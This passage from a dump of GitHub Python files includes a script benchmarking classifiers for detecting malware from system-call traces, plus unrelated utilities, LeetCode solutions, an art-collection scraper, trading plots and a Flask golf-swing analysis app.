int(input(\"N-Gram Upper bound? Input a number \"))\n weight = int(input(\"What weight do you want to use to separate train & testing? Input a number \"))\n\n\nmain_corpus = []\nmain_corpus_target = []\n\nmy_categories = ['benign', 'malware']\n\n# feeding corpus the testing data\n\nprint(\"Loading system call database for categories:\")\nprint(my_categories if my_categories else \"all\")\n\n\nimport glob\nimport os\n\nmalCOUNT = 0\nbenCOUNT = 0\nfor filename in glob.glob(os.path.join('./sysMAL', '*.txt')):\n fMAL = open(filename, \"r\")\n aggregate = \"\"\n for line in fMAL:\n linea = line[:(len(line)-1)]\n aggregate += \" \" + linea\n main_corpus.append(aggregate)\n main_corpus_target.append(1)\n malCOUNT += 1\n\nfor filename in glob.glob(os.path.join('./sysBEN', '*.txt')):\n fBEN = open(filename, \"r\")\n aggregate = \"\"\n for line in fBEN:\n linea = line[:(len(line) - 1)]\n aggregate += \" \" + linea\n main_corpus.append(aggregate)\n main_corpus_target.append(0)\n benCOUNT += 1\n\n# shuffling the dataset\nmain_corpus_target, main_corpus = shuffle(main_corpus_target, main_corpus, random_state=0)\n\n\n\n\n# weight as determined in the top of the code\ntrain_corpus = main_corpus[:(weight*len(main_corpus)//(weight+1))]\ntrain_corpus_target = main_corpus_target[:(weight*len(main_corpus)//(weight+1))]\ntest_corpus = main_corpus[(len(main_corpus)-(len(main_corpus)//(weight+1))):]\ntest_corpus_target = main_corpus_target[(len(main_corpus)-len(main_corpus)//(weight+1)):]\n\n\n\n\nprint(\"%d documents - %0.3fMB (training set)\" % (\n len(train_corpus_target), train_corpus_size_mb))\nprint(\"%d documents - %0.3fMB (test set)\" % (\n len(test_corpus_target), test_corpus_size_mb))\nprint(\"%d categories\" % len(my_categories))\nprint()\nprint(\"Benign Traces: \"+str(benCOUNT)+\" traces\")\nprint(\"Malicious Traces: \"+str(malCOUNT)+\" traces\")\nprint()\n\n\n\nprint(\"Extracting features from the training data using a sparse vectorizer...\")\nt0 = time()\n\nif useTFIDF:\n vectorizer = TfidfVectorizer(ngram_range=(nGRAM1, nGRAM2), min_df=1, use_idf=True, smooth_idf=True) ##############\nelse:\n vectorizer = CountVectorizer(ngram_range=(nGRAM1, nGRAM2))\n\nanalyze = vectorizer.build_analyzer()\n\nif showSampleVector:\n print(analyze(test_corpus[1]))\n\nX_train = vectorizer.fit_transform(train_corpus)\n\n\n\nduration = time() - t0\nprint(\"done in %fs at %0.3fMB/s\" % (duration, train_corpus_size_mb / duration))\nprint(\"n_samples: %d, n_features: %d\" % X_train.shape)\nprint()\n\nprint(\"Extracting features from the test data using the same vectorizer...\")\nt0 = time()\nX_test = vectorizer.transform(test_corpus)\nduration = time() - t0\nprint(\"done in %fs at %0.3fMB/s\" % (duration, test_corpus_size_mb / duration))\nprint(\"n_samples: %d, n_features: %d\" % X_test.shape)\nprint()\n\n\n# show which are the definitive features\ndef show_most_informative_features(vectorizer, clf, n=20):\n feature_names = vectorizer.get_feature_names()\n coefs_with_fns = sorted(zip(clf.coef_[0], feature_names))\n coefs_with_fns_mal = coefs_with_fns[:-(n + 1):-1]\n coefs_with_fns = sorted(zip(clf.coef_[0], feature_names))[:n]\n\n print()\n print(\"Most Informative Benign Features:\")\n for (coef_1, fn_1) in coefs_with_fns:\n print(coef_1, fn_1)\n print()\n print(\"Most Informative Malicious Features:\")\n for (coef_2, fn_2) in coefs_with_fns_mal:\n print(coef_2, fn_2)\n print()\n\n\ndef benchmark(clf, showTopFeatures=False):\n print('_'*60)\n print(\"Training: \")\n print(clf)\n t0 = time()\n clf.fit(X_train, train_corpus_target)\n\n train_time = time() - t0\n print(\"train time: %0.3fs\" % train_time)\n\n\n t0 = time()\n pred = clf.predict(X_test)\n test_time = time() - t0\n print(\"test time: %0.3fs\" % test_time)\n\n score = metrics.accuracy_score(test_corpus_target, pred)\n print(\"accuracy: %0.3f\" % score)\n\n if hasattr(clf, 'coef_'):\n print(\"dimensionality: %d\" % clf.coef_.shape[1])\n print(\"density: %f\" % density(clf.coef_))\n print()\n print(metrics.classification_report(test_corpus_target, pred,target_names=my_categories))\n print()\n clf_descr = str(clf).split('(')[0]\n\n print(\"Predicted values: \")\n print(pred.tolist());\n print()\n print(\"Real values:\")\n print(test_corpus_target)\n print()\n mCount = 0\n for i in test_corpus_target:\n if i == 1:\n mCount+=1\n print(\"Proportion of malicious trace:\")\n print(mCount/len(test_corpus_target))\n\n if showTopFeatures:\n show_most_informative_features(vectorizer, clf, 10)\n\n return clf_descr, score, train_time, test_time\n\n\nresults = []\nfor clf, name in (\n (RidgeClassifier(tol=1e-2, solver=\"lsqr\"), \"Ridge Classifier\"),\n (Perceptron(n_iter=50), \"Perceptron\"),\n (PassiveAggressiveClassifier(n_iter=50), \"Passive-Aggressive\"),\n (KNeighborsClassifier(n_neighbors=10), \"kNN\"),\n (RandomForestClassifier(n_estimators=100), \"Random forest\")):\n print('=' * 80)\n print(name)\n results.append(benchmark(clf))\n\n\n\n\n\n\nfor penalty in [\"l2\", \"l1\"]:\n print('=' * 80)\n print(\"%s penalty\" % penalty.upper())\n # Train Liblinear model\n results.append(benchmark(LinearSVC(penalty=penalty, dual=False,\n tol=1e-3), showMostInformativeFeatures))\n\n # Train SGD model\n results.append(benchmark(SGDClassifier(alpha=.0001, n_iter=50,\n penalty=penalty), showMostInformativeFeatures))\n\n# Train SGD with Elastic Net penalty\nprint('=' * 80)\nprint(\"Elastic-Net penalty\")\nresults.append(benchmark(SGDClassifier(alpha=.0001, n_iter=50,\n penalty=\"elasticnet\")))\n\n# Train NearestCentroid without threshold\nprint('=' * 80)\nprint(\"NearestCentroid (aka Rocchio classifier)\")\nresults.append(benchmark(NearestCentroid()))\n\n# Train sparse Naive Bayes classifiers\nprint('=' * 80)\nprint(\"Naive Bayes\")\nresults.append(benchmark(MultinomialNB(alpha=.01)))\nresults.append(benchmark(BernoulliNB(alpha=.01)))\n\nprint('=' * 80)\nprint(\"LinearSVC with L1-based feature selection\")\n# The smaller C, the stronger the regularization.\n# The more regularization, the more sparsity.\nresults.append(benchmark(Pipeline([\n ('feature_selection', SelectFromModel(LinearSVC(penalty=\"l1\", dual=False,\n tol=1e-3))),\n ('classification', LinearSVC(penalty=\"l2\"))])))\n\n\n# plotting results\n\nindices = np.arange(len(results))\n\nresults = [[x[i] for x in results] for i in range(4)]\n\nclf_names, score, training_time, test_time = results\ntraining_time = np.array(training_time) / np.max(training_time)\ntest_time = np.array(test_time) / np.max(test_time)\n\nplt.figure(figsize=(12, 8))\nplt.title(\"Score\")\nplt.barh(indices, score, .2, label=\"score\", color='navy')\nplt.barh(indices + .3, training_time, .2, label=\"training time\",\n color='c')\nplt.barh(indices + .6, test_time, .2, label=\"test time\", color='darkorange')\nplt.yticks(())\nplt.legend(loc='best')\nplt.subplots_adjust(left=.25)\nplt.subplots_adjust(top=.95)\nplt.subplots_adjust(bottom=.05)\n\nfor i, c in zip(indices, clf_names):\n plt.text(-.3, i, c)\n\nplt.show()\n","repo_name":"NtMalDetect/NtMalDetect","sub_path":"finding_models/testing_classifiers.py","file_name":"testing_classifiers.py","file_ext":"py","file_size_in_byte":9380,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"40"} +{"seq_id":"42701601698","text":"from ping3 import ping\n\nfrom utils.get_url import get_json_from_url\n\n\ndef get_game_pings():\n cs2 = get_cs2()\n valo = get_valorant()\n return {\n \"cs2_sgp\": cs2[\"sgp\"],\n \"cs2_bom\": cs2[\"bom\"],\n \"valo_sea\": valo[\"sea\"]\n }\n\n\ndef get_cs2():\n req = get_json_from_url(\"https://api.steampowered.com/ISteamApps/GetSDRConfig/v1/?appid=730\")\n sgp_relays = req.get(\"pops\").get(\"sgp\").get(\"relays\")\n first_relay_ipv4 = sgp_relays[0].get(\"ipv4\")\n sgp_round_trip_time = ping_ipv4(first_relay_ipv4)\n\n bom_relays = req.get(\"pops\").get(\"bom2\").get(\"relays\")\n first_relay_ipv4 = bom_relays[0].get(\"ipv4\")\n bom_round_trip_time = ping_ipv4(first_relay_ipv4)\n\n return {\n \"sgp\": sgp_round_trip_time,\n \"bom\": bom_round_trip_time\n }\n\n\ndef get_valorant():\n sea_valo = \"dynamodb.ap-southeast-1.amazonaws.com\"\n sea_round_trip_time = ping_ipv4(sea_valo)\n return {\n \"sea\": sea_round_trip_time\n }\n\n\ndef ping_ipv4(ipv4_address):\n response = ping(ipv4_address, unit='ms', timeout=1)\n return int(response)\n","repo_name":"phoenixatom/SVS","sub_path":"modules/game_pings.py","file_name":"game_pings.py","file_ext":"py","file_size_in_byte":1070,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"2911420293","text":"import numpy\nfrom copy import deepcopy\n\n\nenable_log = True\nlog_file = \"log.txt\"\nlog_indent = 0\n\n\nclass Function:\n def __init__(self, name):\n self.name = name\n self.args = []\n self.defs = []\n self.given_args = []\n\n def __str__(self):\n string = self.name\n for arg in self.given_args:\n if separate(str(arg))[0] != str(arg):\n string += \" (\" + str(arg) + \")\"\n else:\n string += \" \" + str(arg)\n return string\n\n def __repr__(self):\n return \"Function(\" + self.name + \")\"\n\n def add_def(self, args, body):\n self.args.append(args)\n self.defs.append(body)\n\n def evaluate(self, new_args, namespace):\n args = self.given_args + new_args\n if enable_log:\n string = self.name\n for arg in args:\n if separate(str(arg))[0] != str(arg):\n string += \" (\" + str(arg) + \")\"\n else:\n string += \" \" + str(arg)\n log(\"(start) evaluating \" + string + \" \" + str(namespace), 1)\n arg_matches = deepcopy(self.args)\n for i in range(len(self.given_args), len(args)):\n for j in range(len(self.args)):\n if i < len(self.args[j]) and not isinstance(self.args[j][i], Function):\n if args[i] != self.args[j][i]:\n arg_matches[j] = None\n for i in range(len(arg_matches)):\n if arg_matches[i] is not None and len(arg_matches[i]) <= len(args):\n result = self.call(args, i, namespace)\n if enable_log:\n log(\"(full) evaluating \" + string + \" got \" + str(result), -1)\n return result\n matches = [arg for arg in arg_matches if arg is not None]\n defs = [self.defs[i] for i in range(len(arg_matches)) if arg_matches[i] is not None]\n result = type(self)(self.name)\n for i in range(len(matches)):\n result.add_def(matches[i], defs[i])\n result.given_args = args\n if enable_log:\n log(\"(partial) evaluating \" + string + \" got \" + str(result), -1)\n return result\n\n def call(self, args, which, namespace):\n taken_num = len(self.args[which])\n local_namespace = deepcopy(namespace)\n for i in range(taken_num):\n if isinstance(self.args[which][i], Function):\n local_namespace[self.args[which][i].name] = args[i]\n body_parts = [value(part, local_namespace) for part in separate(self.defs[which])]\n if not isinstance(body_parts[0], Function):\n return body_parts[0]\n func = body_parts[0]\n func_args = body_parts[1:]\n result = func.evaluate(func_args, local_namespace)\n remaining_args = args[taken_num:]\n if not isinstance(result, Function):\n if len(remaining_args) > 0:\n raise RuntimeError(\"Too many arguments for \" + self.name)\n return result\n return result.evaluate(remaining_args, namespace)\n\n\ndef value(string, namespace):\n if enable_log:\n log(\"(start) finding value of \" + string + \" \" + str(namespace), 1)\n stripped = string.strip()\n while stripped[0] == \"(\" and stripped[-1] == \")\":\n stripped = stripped[1:-1]\n if stripped[0] == stripped[-1] == '\"':\n result = stripped[1:-1]\n if enable_log:\n log(\"(value) value of \" + string + \" is \" + str(result), -1)\n return result\n if stripped[0] == \"[\" and stripped[-1] == \"]\":\n parts = separate(stripped[1:-1])\n val = []\n for part in parts:\n val.append(value(part, namespace))\n result = numpy.array(val)\n if enable_log:\n log(\"(value) value of \" + string + \" is \" + str(result), -1)\n return result\n try:\n val = numpy.int(stripped)\n except ValueError:\n pass\n else:\n result = val\n if enable_log:\n log(\"(value) value of \" + string + \" is \" + str(result), -1)\n return result\n try:\n val = numpy.float32(stripped)\n except ValueError:\n pass\n else:\n result = val\n if enable_log:\n log(\"(value) value of \" + string + \" is \" + str(result), -1)\n return result\n parts = separate(stripped)\n name = parts[0]\n args = [value(arg, namespace) for arg in parts[1:]]\n if name in namespace:\n if not isinstance(namespace[name], Function):\n result = namespace[name]\n if enable_log:\n log(\"(name) value of \" + string + \" is \" + str(result), -1)\n return result\n result = namespace[name].evaluate(args, namespace)\n if enable_log:\n log(\"(namefun) value of \" + string + \" is \" + str(result), -1)\n return result\n result = Function(name).evaluate(args, namespace)\n if enable_log:\n log(\"(func) value of \" + string + \" is \" + str(result), -1)\n return result\n\n\ndef separate(string):\n parts = []\n paren_depth = 0\n in_str = False\n in_space = True\n part_start = 0\n for i in range(len(string)):\n char = string[i]\n if not in_space and char == \" \":\n in_space = True\n if paren_depth == 0 and not in_str:\n parts.append(string[part_start:i])\n elif in_space and char != \" \":\n in_space = False\n if paren_depth == 0 and not in_str:\n part_start = i\n if char in \"[(\":\n paren_depth += 1\n elif char in \"])\":\n paren_depth -= 1\n elif char == '\"':\n in_str = not in_str\n if not in_space:\n parts.append(string[part_start:])\n return parts\n\n\ndef log(string, ind_inc):\n global log_indent\n with open(log_file, \"a\") as file:\n file.write(\" \" * log_indent + string + \"\\n\")\n log_indent += ind_inc\n","repo_name":"Shrimpy48/interpret","sub_path":"core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":5913,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"36577031219","text":"class Solution(object):\r\n def hasCycle(self, head):\r\n \"\"\"\r\n :type head: ListNode\r\n :rtype: bool\r\n \"\"\"\r\n first, second = head, head\r\n while first and second and second.next:\r\n first = first.next\r\n second = second.next.next\r\n if first == second:\r\n return True\r\n return False\r\n","repo_name":"andychuah/Leetcode","sub_path":"Leetcode-141.py","file_name":"Leetcode-141.py","file_ext":"py","file_size_in_byte":374,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"19653264593","text":"import requests\nfrom bs4 import BeautifulSoup\nimport re\nfrom tqdm import tqdm\nimport os\nimport urllib\n\nDIR_PATH = os.path.dirname(os.path.abspath(__file__))\n\n# original date ranges, from the site\nSEARCH_DATE_RANGES = [\"8000 BCE\",\"7000 BCE\",\"6000 BCE\",\"5000 BCE\",\"4000 BCE\",\"3000 BCE\",\"2000 BCE\",\"1000 BCE\",\"1 CE\",\"500 CE\",\"1000 CE\",\"1200\",\"1400\",\"1600\",\"1700\",\"1800\",\"1900\",\"1910\",\"1920\",\"1930\",\"1940\",\"1950\",\"1960\",\"1970\",\"1980\",\"1990\",\"2000\",\"2010\",\"Present\"]\n# had to go 10 years at a time as the 1800-1900 range has more than 10k results\n# which is the max number of results that can be returned\nSEARCH_DATE_RANGES_1800 = list(map(str, range(1800, 1901, 10)))\n\nIIIF_DOWNLOAD_URLS_OUT_PATH = os.path.join(DIR_PATH, '_data', '0.iiif-manifest-urls.txt')\nIIIF_MANIFEST_URL = 'https://api.artic.edu/api/v1/artworks/{}/manifest.json'\n\ndef get_search_url(date_start, date_end, page_number):\n url_params = urllib.parse.urlencode({\n 'date-start': date_start,\n 'date-end': date_end,\n 'page': page_number\n })\n url = 'https://www.artic.edu/collection?{}&is_public_domain=1'.format(\n url_params\n )\n return url\n\n\n# return object ids, and whether there is a next page\ndef get_page_results_and_next_page_url(url):\n print(url)\n\n page_html = requests.get(url).text\n\n if 'Sorry, we couldn’t find any results matching your criteria' in page_html:\n return {'artwork_ids': [], 'next_page_url': None}\n\n page_soup = BeautifulSoup(page_html, 'html.parser')\n\n next_page_url = None\n # I've seen nicer code.\n res = page_soup.find_all('ul', class_='m-paginator__prev-next')\n if len(res) == 1:\n next_li = res[0].find_all('li')\n if len(next_li):\n next_li = next_li[0]\n next_span = next_li.find_all('span')[0]\n if next_span.text == 'Next':\n next_link = next_li.find_all('a')[0]\n next_page_url = next_link['href']\n else:\n print('ERR could not find ul > li')\n\n artwork_ids = []\n res = page_soup.find('ul', {'id': 'artworksList'})\n if res:\n listings = res.find_all('li', class_='m-listing')\n for listing in listings:\n res = re.search(r'artworks/(\\d+)/', listing.find('a')['href'])\n artwork_ids.append(res.groups()[0])\n else:\n print('ERR could not find artworksList')\n\n return {\n 'artwork_ids': artwork_ids,\n 'next_page_url': next_page_url \n }\n\n\nwith open(IIIF_DOWNLOAD_URLS_OUT_PATH, 'a') as f_out:\n for date_range_idx in tqdm(range(len(SEARCH_DATE_RANGES_1800) - 1)):\n date_start = SEARCH_DATE_RANGES_1800[date_range_idx]\n date_end = SEARCH_DATE_RANGES_1800[date_range_idx + 1]\n\n next_page_url = get_search_url(date_start, date_end, 1)\n with tqdm() as pbar:\n while next_page_url:\n results = get_page_results_and_next_page_url(next_page_url)\n\n for listing_id in results['artwork_ids']:\n url = IIIF_MANIFEST_URL.format(listing_id)\n f_out.write('{}\\n'.format(url))\n\n # may be None, signalling we've iterated through all pages\n next_page_url = results['next_page_url']\n pbar.update(1)\n","repo_name":"gregsadetsky/open-access-is-great-but-where-are-the-images","sub_path":"0.scrapers/chicago/0.get_all_search_results.py","file_name":"0.get_all_search_results.py","file_ext":"py","file_size_in_byte":3029,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"40"} +{"seq_id":"1638541793","text":"# -*- coding: utf-8 -*-\n\"\"\"Stochastic Gradient Descent\"\"\"\n\ndef compute_stoch_gradient(y, tx, w, batch_size):\n \"\"\"Compute a stochastic gradient from just few examples n and their corresponding y_n labels.\"\"\"\n sto_grad = np.zeros(w.shape)\n nb_grad = 0\n for minibatch_y, minibatch_tx in batch_iter(y, tx, batch_size) :\n sto_grad += compute_gradient(minibatch_y, minibatch_tx, w)\n nb_grad += 1\n return sto_grad / nb_grad\n \n\n\ndef stochastic_gradient_descent(\n y, tx, initial_w, batch_size, max_iters, gamma):\n \"\"\"Stochastic gradient descent algorithm.\"\"\"\n ws = [initial_w]\n losses = []\n w = initial_w\n \n for n_iter in range(max_iters) :\n \n sto_grad = compute_stoch_gradient(y, tx, w, batch_size)\n \n w = w - gamma * sto_grad\n loss = compute_loss(y, tx, w)\n \n ws.append(w)\n losses.append(loss)\n print(\"Stochastic Gradient Descent({bi}/{ti}): loss={l}, w0={w0}, w1={w1}\".format(\n bi=n_iter, ti=max_iters - 1, l=loss, w0=w[0], w1=w[1]))\n \n return losses, ws","repo_name":"Caotick/ADA-ML","sub_path":"labs-ML/ex02/template/stochastic_gradient_descent.py","file_name":"stochastic_gradient_descent.py","file_ext":"py","file_size_in_byte":1091,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"8978381731","text":"\nimport os\nimport pandas as pd\nfrom pandas.api.types import CategoricalDtype\nfrom matplotlib.ticker import FormatStrFormatter\nimport matplotlib.ticker as ticker\nfrom .vizualization import Vizualization\n\n\nclass BehaviorAssetDataVisualization(Vizualization):\n\n def __init__(self, ticker: str, start_time: str, end_time: str, data: pd.DataFrame):\n super().__init__()\n self._data = data.copy()\n self._ticker = ticker\n self._start_time = start_time\n self._end_time = end_time\n\n def plot_avg_hourly_spread_trade(self):\n self._data['Hour'] = self._data['il_tz'].dt.hour\n by_hour = self._data.groupby('Hour')['Spread'].mean()\n if (by_hour == 0.0).all():\n return\n else:\n try:\n by_hour = by_hour.to_frame()\n by_hour = by_hour.reset_index()\n by_hour.set_index('Hour', inplace=True)\n title = f'Average Hourly Spread: {self._ticker} {self._start_time} - {self._end_time}'\n fig, ax = self.plt.subplots(figsize=(12, 8))\n by_hour.plot(kind='bar', ax=ax, title=title, fontsize=16)\n self.plt.xlabel('IL Time')\n self.plt.ylabel('Spread')\n plot_type = 'bh_avg_h_spread_plot'\n plot_id = self._generate_id()\n plot_name = plot_id + '-' + plot_type + '.png'\n plots_dir = self._plots_path\n img_path = os.path.join(plots_dir, plot_name)\n self.plt.savefig(img_path)\n self.plt.close()\n except Exception as e:\n print(\"An error occurred:\", str(e))\n return img_path\n\n def plot_avg_hourly_price_change_trade(self):\n try:\n title = f'Average Hourly Price Change ABS: {self._ticker} {self._start_time} - {self._end_time}'\n self._data['Hour'] = self._data['il_tz'].dt.hour\n self._data.dropna().groupby('Hour')['Price Change ABS'].mean().plot(\n kind='bar', figsize=(12, 8), title=title, fontsize=16)\n self.plt.xlabel('IL Time')\n self.plt.ylabel('Price Change')\n plot_type = 'bh_avg_h_price_change_plot'\n plot_id = self._generate_id()\n plot_name = plot_id + '-' + plot_type + '.png'\n plots_dir = self._plots_path\n img_path = os.path.join(plots_dir, plot_name)\n self.plt.savefig(img_path)\n self.plt.close()\n except Exception as e:\n print(\"An error occurred:\", str(e))\n return img_path\n\n def plot_avg_volume_trade(self, freq: str = None):\n freq_str = freq if freq is not None else \"1H\"\n\n if (self._data['Volume'] == 0.0).all():\n return\n\n title = f'Average Volume Traded ({freq_str}): {self._ticker} {self._start_time} - {self._end_time}'\n try:\n if freq is not None:\n self._data = self._data.resample(freq).last().dropna()\n self._data['Day Of Week'] = self._data['il_tz'].dt.strftime(\n '%a')\n self._data.dropna().groupby('Day Of Week')['Volume'].mean().plot(\n kind='bar', figsize=(12, 8), title=title, fontsize=16)\n else:\n self._data['Hour'] = self._data['il_tz'].dt.hour\n self._data.dropna().groupby('Hour')['Volume'].mean().plot(\n kind='bar', figsize=(12, 8), title=title, fontsize=16)\n\n self.plt.gca().yaxis.set_major_formatter(FormatStrFormatter('%.0f'))\n self.plt.xlabel('IL Time')\n self.plt.ylabel('Volume')\n\n plot_type = f'bh_avg_{freq_str}_volume_plot'\n plot_id = self._generate_id()\n plot_name = plot_id + '-' + plot_type + '.png'\n plots_dir = self._plots_path\n img_path = os.path.join(plots_dir, plot_name)\n self.plt.savefig(img_path)\n self.plt.close()\n except Exception as e:\n print(\"An error occurred:\", str(e))\n return img_path\n\n def plot_graularity_cover_cost(self, freq: str = '1H'):\n\n try:\n\n self._data['Cover Costs'] = self._data['Price Change ABS'] > self._data['Spread']\n if freq != '1H':\n self._data = self._data.resample(freq).last().dropna()\n if freq == '1D':\n self._data['Day Of Week'] = self._data['il_tz'].dt.strftime(\n '%a')\n title = f'Cover Costs Granularity(1W): {self._ticker} {self._start_time} - {self._end_time}'\n self._data.dropna().groupby('Day Of Week')['Cover Costs'].mean().plot(\n kind='bar', figsize=(12, 8), title=title, fontsize=16)\n else:\n self._data['Hour'] = self._data['il_tz'].dt.hour\n title = f'Cover Costs Granularity({freq}): {self._ticker} {self._start_time} - {self._end_time}'\n self._data.dropna().groupby('Hour')['Cover Costs'].mean().plot(\n kind='bar', figsize=(12, 8), title=title, fontsize=16)\n\n # Set the y-axis tick format as a percentage\n formatter = ticker.PercentFormatter(xmax=1, decimals=0)\n self.plt.gca().yaxis.set_major_formatter(formatter)\n # Specify the y-axis tick positions\n self.plt.gca().yaxis.set_major_locator(\n ticker.FixedLocator(self.plt.gca().get_yticks()))\n self.plt.xlabel('IL Time')\n self.plt.ylabel('% Bars cover costs')\n plot_type = f'bh_{freq}_cover_costs'\n plot_id = self._generate_id()\n plot_name = plot_id + '-' + plot_type + '.png'\n plots_dir = self._plots_path\n img_path = os.path.join(plots_dir, plot_name)\n self.plt.savefig(img_path)\n self.plt.close()\n except Exception as e:\n print(\"An error occurred:\", str(e))\n return img_path\n","repo_name":"Jenya13/analityc_tele_bot","sub_path":"src/analysis/behavior_asset_visualization.py","file_name":"behavior_asset_visualization.py","file_ext":"py","file_size_in_byte":5955,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"10786793255","text":"# Time: O(n)\n# Space: O(n)\n\nclass Solution(object):\n def canChoose(self, groups, nums):\n \"\"\"\n :type groups: List[List[int]]\n :type nums: List[int]\n :rtype: bool\n \"\"\"\n def getPrefix(pattern):\n prefix = [-1]*len(pattern)\n j = -1\n for i in xrange(1, len(pattern)):\n while j+1 > 0 and pattern[j+1] != pattern[i]:\n j = prefix[j]\n if pattern[j+1] == pattern[i]:\n j += 1\n prefix[i] = j\n return prefix\n \n def KMP(text, pattern, start):\n prefix = getPrefix(pattern)\n j = -1\n for i in xrange(start, len(text)):\n while j+1 > 0 and pattern[j+1] != text[i]:\n j = prefix[j]\n if pattern[j+1] == text[i]:\n j += 1\n if j+1 == len(pattern):\n return i-j\n return -1\n\n pos = 0\n for group in groups:\n pos = KMP(nums, group, pos)\n if pos == -1:\n return False\n pos += len(group)\n return True\n\n","repo_name":"kamyu104/LeetCode-Solutions","sub_path":"Python/form-array-by-concatenating-subarrays-of-another-array.py","file_name":"form-array-by-concatenating-subarrays-of-another-array.py","file_ext":"py","file_size_in_byte":1170,"program_lang":"python","lang":"en","doc_type":"code","stars":4314,"dataset":"github-code","pt":"40"} +{"seq_id":"23522264759","text":"import os\nimport sys\nimport cv2\nimport json\nimport pickle\nimport numpy as np\nfrom datetime import datetime\nfrom flask import Flask, request, send_from_directory, abort\nimport torch\nfrom torch.utils.data import DataLoader\nfrom torchvision import transforms\nimport torch.nn.functional as F\n\nfrom anal_poses import anal\nfrom anal_poses.utils import MyEncoder\n\n# openpose 패스 설정\nop_path = \"C:/openpose/bin/python/openpose/Release\"\nsys.path.append(op_path)\nos.environ['PATH'] = os.environ['PATH'] + ';' + 'C:/openpose/bin'\n\n# openpose import\ntry :\n import pyopenpose as op\nexcept ImportError as e:\n raise e\n\n# golfDB 패스 설정\ngolfdb_path = \"C:\\\\golfdb\\\\\"\nsys.path.append(golfdb_path)\n\ntry:\n from test_video import SampleVideo, event_names\n from eval import ToTensor, Normalize\n from model import EventDetector\nexcept ImportError as e:\n raise e\n\n# 플라스크 시작\napp = Flask(__name__, static_url_path='/static')\n\n\n@app.route('/uploads', methods=['POST'])\ndef upload_file():\n print('성공')\n file = request.files['video']\n video_path = os.path.join(os.getcwd(), file.filename)\n file.save(video_path)\n\n \"\"\"\n -----------------------\n 골프 db 에서 모델을 가져온다\n -----------------------\n \"\"\"\n print('golfdb 시작')\n ds = SampleVideo(video_path, transform=transforms.Compose([ToTensor(),\n Normalize([0.485, 0.456, 0.406],\n [0.229, 0.224, 0.225])]))\n\n dl = DataLoader(ds, batch_size=1, shuffle=False, drop_last=False)\n\n model = EventDetector(pretrain=True,\n width_mult=1.,\n lstm_layers=1,\n lstm_hidden=256,\n bidirectional=True,\n dropout=False)\n\n save_dict = torch.load('models/swingnet_1800.pth.tar')\n device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n print('Using device:', device)\n model.load_state_dict(save_dict['model_state_dict'])\n model.to(device)\n model.eval()\n print(\"Loaded model weights\")\n\n seq_length = 64\n cwd = os.getcwd()\n print(cwd)\n save_path = cwd + '/static/output_images/'\n print(save_path)\n print('Testing...')\n for sample in dl:\n images = sample['images']\n # full samples do not fit into GPU memory so evaluate sample in 'seq_length' batches\n batch = 0\n while batch * seq_length < images.shape[1]:\n if (batch + 1) * seq_length > images.shape[1]:\n image_batch = images[:, batch * seq_length:, :, :, :]\n else:\n image_batch = images[:, batch * seq_length:(batch + 1) * seq_length, :, :, :]\n logits = model(image_batch.cuda())\n if batch == 0:\n probs = F.softmax(logits.data, dim=1).cpu().numpy()\n else:\n probs = np.append(probs, F.softmax(logits.data, dim=1).cpu().numpy(), 0)\n batch += 1\n\n events = np.argmax(probs, axis=0)[:-1]\n print('Predicted event frames: {}'.format(events))\n\n \"\"\"\n cv2 비디오 캡쳐 오픈\n \"\"\"\n cap = cv2.VideoCapture(video_path)\n\n confidence = []\n for i, e in enumerate(events):\n confidence.append(probs[e, i])\n print('Condifence: {}'.format([np.round(c, 3) for c in confidence]))\n\n \"\"\"\n openpose 객체 오픈\n 및 파라미터 설정\n \"\"\"\n params = dict()\n params[\"model_folder\"] = \"C:\\\\openpose\\\\models\\\\\"\n params[\"number_people_max\"] = 1\n params[\"net_resolution\"] = \"-1x240\"\n\n opWrapper = op.WrapperPython()\n opWrapper.configure(params)\n opWrapper.start()\n\n datum = op.Datum()\n\n # 이미지를 저장할 filename을 현재 시간으로 설정\n now = datetime.now()\n image_save_name = datetime.timestamp(now)\n\n # 각 프레임의 키포인트를 dict 로 모음\n key_data = dict()\n for i, e in enumerate(events):\n cap.set(cv2.CAP_PROP_POS_FRAMES, e)\n _, img = cap.read()\n # cv2.putText(img, '{:.3f}'.format(confidence[i]), (20, 20), cv2.FONT_HERSHEY_DUPLEX, 0.75, (0, 0, 255))\n\n # golfdb 가 뽑아낸 이미지를 op 객체에\n datum.cvInputData = img\n opWrapper.emplaceAndPop(op.VectorDatum([datum]))\n key_data[i] = datum.poseKeypoints[0]\n cv2.imwrite(f'{save_path}{image_save_name}_{str(i)}.png', datum.cvOutputData)\n\n cap.release()\n\n # 뽑아낸 키포인트를 분석\n swing_anal = anal.Anal(key_data)\n\n result = swing_anal.check_all()\n\n # result에 이미지가 저장되는 경로 넣어줌\n result[\"image_path\"] = image_save_name\n\n return json.dumps(result, cls=MyEncoder)\n\n\n@app.route('/get-images/')\ndef get_images(image_name, i):\n\n image = send_from_directory(\"C:\\\\Users\\\\USER\\\\PycharmProjects\\\\flask_study\\\\static\\\\output_images\",\n filename=f\"{i}.png\", as_attachment=True)\n\n try:\n return image\n except FileNotFoundError:\n abort(404)\n\n\nif __name__ == '__main__':\n app.run(debug=True, host='0.0.0.0', port=80)","repo_name":"muu86/video_upload_flask","sub_path":"op_golfdb.py","file_name":"op_golfdb.py","file_ext":"py","file_size_in_byte":5137,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"70055948600","text":"from plone.memoize import view\n\nclass ResultsView(object):\n\n @view.memoize\n def __call__(self):\n \"\"\"Return the collection results with saved form submission\"\"\"\n\n if 'nextprev.form' in self.request:\n # Make a fake request with the saved query string and use the\n # publisher code to reconstitute the values\n fake_req = self.request.__class__(\n stdin=None,\n environ={'QUERY_STRING':\n self.context.REQUEST['nextprev.form'],\n 'SERVER_NAME': '', 'SERVER_PORT': 